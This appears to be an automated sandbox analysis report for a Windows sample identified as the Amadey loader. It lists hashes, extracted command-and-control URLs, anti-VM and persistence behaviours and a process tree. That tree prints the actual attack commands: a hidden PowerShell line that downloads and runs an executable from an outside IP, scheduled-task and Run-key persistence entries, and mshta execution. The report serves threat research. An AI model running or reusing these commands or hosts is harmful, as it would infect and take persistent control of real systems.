Analysis
-
max time kernel
27s -
max time network
66s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26/03/2025, 19:19
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
8c44b645c390b89b4a0d0bcdc9fe036a
-
SHA1
a007e77d13f4cc300e20fe1a866cdc9bb16bb878
-
SHA256
380bd017cb49b4dc69065a7277f120ca8a98c4956df9d383a80ebc0b6459a136
-
SHA512
300dd9fa2c5043d47da7265c37afc2dc8a49ded8fc21c27d310c951f88f72d4b121f2538c8d226374f69c214548262ef2532c1f8d3fe9496880f9e50abec2616
-
SSDEEP
24576:JqDEvCTbMWu7rQYlBQcBiT6rprG8a0bu:JTvC/MTQYxsWR7a0b
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Signatures
-
Amadey family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2072 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2072 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 4 2072 powershell.exe 7 2612 rapes.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE -
Executes dropped EXE 3 IoCs
pid Process 2964 TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE 2612 rapes.exe 2144 dBSGwVB.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE -
Loads dropped DLL 3 IoCs
pid Process 2072 powershell.exe 2964 TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE 2612 rapes.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2964 TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE 2612 rapes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dBSGwVB.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2040 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2072 powershell.exe 2072 powershell.exe 2072 powershell.exe 2964 TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE 2612 rapes.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2072 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2964 TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 1624 wrote to memory of 2344 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 1624 wrote to memory of 2344 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 1624 wrote to memory of 2344 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 1624 wrote to memory of 2344 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 1624 wrote to memory of 2348 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 32 PID 1624 wrote to memory of 2348 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 32 PID 1624 wrote to memory of 2348 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 32 PID 1624 wrote to memory of 2348 1624 2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 32 PID 2344 wrote to memory of 2040 2344 cmd.exe 34 PID 2344 wrote to memory of 2040 2344 cmd.exe 34 PID 2344 wrote to memory of 2040 2344 cmd.exe 34 PID 2344 wrote to memory of 2040 2344 cmd.exe 34 PID 2348 wrote to memory of 2072 2348 mshta.exe 35 PID 2348 wrote to memory of 2072 2348 mshta.exe 35 PID 2348 wrote to memory of 2072 2348 mshta.exe 35 PID 2348 wrote to memory of 2072 2348 mshta.exe 35 PID 2072 wrote to memory of 2964 2072 powershell.exe 37 PID 2072 wrote to memory of 2964 2072 powershell.exe 37 PID 2072 wrote to memory of 2964 2072 powershell.exe 37 PID 2072 wrote to memory of 2964 2072 powershell.exe 37 PID 2964 wrote to memory of 2612 2964 TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE 38 PID 2964 wrote to memory of 2612 2964 TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE 38 PID 2964 wrote to memory of 2612 2964 TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE 38 PID 2964 wrote to memory of 2612 2964 TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE 38 PID 2612 wrote to memory of 2144 2612 rapes.exe 40 PID 2612 wrote to memory of 2144 2612 rapes.exe 40 PID 2612 wrote to memory of 2144 2612 rapes.exe 40 PID 2612 wrote to memory of 2144 2612 rapes.exe 40 PID 2144 wrote to memory of 1640 2144 dBSGwVB.exe 41 PID 2144 wrote to memory of 1640 2144 dBSGwVB.exe 41 PID 2144 wrote to memory of 1640 2144 dBSGwVB.exe 41 PID 2144 wrote to memory of 1640 2144 dBSGwVB.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-26_8c44b645c390b89b4a0d0bcdc9fe036a_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn GGJ0Kma02H1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\aOCr4M8cR.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn GGJ0Kma02H1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\aOCr4M8cR.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2040
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\aOCr4M8cR.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Users\Admin\AppData\Local\TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE"C:\Users\Admin\AppData\Local\TempMMA2QUWPGMKOV7ZURGGA72RC1KCFBLVX.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe"C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Public\Netstat\netsup.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:1640 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"8⤵PID:2932
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13.1MB
MD579a51197969dadee0226635f5977f6ab
SHA11785a081523553690d110c4153e3b3c990c08d45
SHA256868c78f267862af83cf94c9d21615d9c01afe3dbd0da02dc96bbc3a956ccc48d
SHA512202ea6d421bb7163ba741267543dff4f97012f2489f694f06555b1bbffec3a59fe71d5675755f5d746727eaf93b6d8204eab4e11fd692cf82570b1edf8a80a55
-
Filesize
717B
MD57338b59c4244b13d78f3ab9bc5f6f6a9
SHA1b12cef304119f106189f8a55278d879275f1c371
SHA256f0f3e2ebc6ba1643175a55de09f868d75928bf1b5b425430a95b89f719c793ba
SHA51253dd7ab39a862bc097c13fcc3f23bcbb90e2847859a1c74d4a936ee54d7d8bbc8f81bbdd0ece22876ec1ac99dd5c19f2fb3c62b30a2c10e6761ae0c77872171a
-
Filesize
161B
MD5bb8869e7e80234a30633bd0301b57deb
SHA113790ad2bc012431324093b16c19b1e532c94e63
SHA256d6f183097bf12a7f68632efecc6dc7ddac16002839229502b32cd40826dd472c
SHA5127d043054fcde4c73e9e5988330a94a737360adf1b0d806efc4660d1e336e27a66149494b611969a29b873d76bc4b1278b47d1efc27a9c7bd50a1f8cdf346937a
-
Filesize
1.8MB
MD5c3f83f2cb10b8e3be2613d9823b9b533
SHA196441997a25a1b70f792c99a2528b79a8162d1a9
SHA256fe6553869cc3c7e56b673a30b9e977acee40ba8efa2f74b2b5a9b181fc49ff20
SHA5125c27b4a2ca26ddc3778d580f81334867c6f06b98747ff4370ce32678b7dbf0342498e3275b7d47652f09452dac703e465c5e6684f2be1d9488ec0263cf372427